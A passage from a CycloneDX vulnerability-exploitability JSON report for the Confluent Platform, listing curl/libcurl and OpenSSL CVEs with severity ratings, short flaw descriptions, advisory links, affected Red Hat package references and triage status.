          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8927",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        294
      ],
      "description": "When reusing a libcurl handle for sequential transfers driven by\nenvironment-variable proxy configuration, libcurl fails to clear the proxy\nauthentication state between requests. Specifically, if the initial transfer\nauthenticates against `proxyA` using Digest auth, a subsequent transfer routed\nthrough `proxyB` erroneously leaks the `Proxy-Authorization:` header intended\nsolely for `proxyA`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8927"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55432"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8927"
        },
        {
          "url": "https://bugzilla.redhat.com/2496769"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496769"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8927.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8927.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8927.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8927"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55432.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55432"
        },
        {
          "url": "https://github.com/advisories/GHSA-jr4f-4564-w3mr"
        },
        {
          "url": "https://hackerone.com/reports/3744543"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8927.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55432.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8927"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8927"
        }
      ],
      "published": "2026-07-03T07:16:25+00:00",
      "updated": "2026-07-07T23:21:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-8932",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "description": "libcurl would reuse a previously created connection even when some mTLS config\nrelated option had been changed that should have prohibited reuse.\n\nlibcurl keeps previously used connections in a connection pool for subsequent\ntransfers to reuse if one of them matches the setup. However, some TLS\nsettings related to client certificates were left out from the configuration\nmatch checks, making them match too easily. In particular options related to\nthe private key.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8932"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8932"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8932.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8932.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-m7xm-hf59-w6rj"
        },
        {
          "url": "https://hackerone.com/reports/3733910"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8932"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8932"
        }
      ],
      "published": "2026-07-03T07:16:25+00:00",
      "updated": "2026-07-07T23:18:32+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-9076",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: When CMS password-based decryption (RFC 3211 / PWRI key unwrap)\nprocesses attacker-supplied CMS data, an attacker-chosen stream-mode KEK\ncipher can trigger a heap out-of-bounds read in kek_unwrap_key().\n\nImpact summary: A heap buffer over-read may trigger a crash which leads to\nDenial of Service for an application if the input buffer ends at a memory\npage boundary and the following page is unmapped. There is no information\ndisclosure as the over-read bytes are not revealed to the attacker.\n\nThe key unwrapping function performs a check-byte test as specified in the\nRFC that reads 7 bytes from a heap allocation that is based on the wrapped\nkey length from the message. There is a minimum length check based on the\nblock length of the wrapping cipher. However the cipher is selected from\nan OID carried in the attacker's PWRI keyEncryptionAlgorithm with no\nrequirement that the cipher be a block cipher. When an attacker selects\na stream-mode cipher the guard will be ineffective and the allocated buffer\ncontaining the unwrapped key can be too small to fit the check-bytes\nspecified in the RFC and a buffer over-read can happen.\n\nApplications calling CMS_decrypt() or CMS_decrypt_set1_password()\n(equivalently openssl cms -decrypt -pwri_password ...) on untrusted CMS\ndata are vulnerable to this issue. No password knowledge is required: the\nover-read happens during the unwrap attempt before any authentication\nsucceeds.\n\nThe over-read is limited to a few bytes and is not written to output, so\nthere is no information disclosure. Triggering a crash requires the\nallocation to border unmapped memory, which is unlikely with the normal\nallocator.\n\nThe FIPS modules are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9076"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9076"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
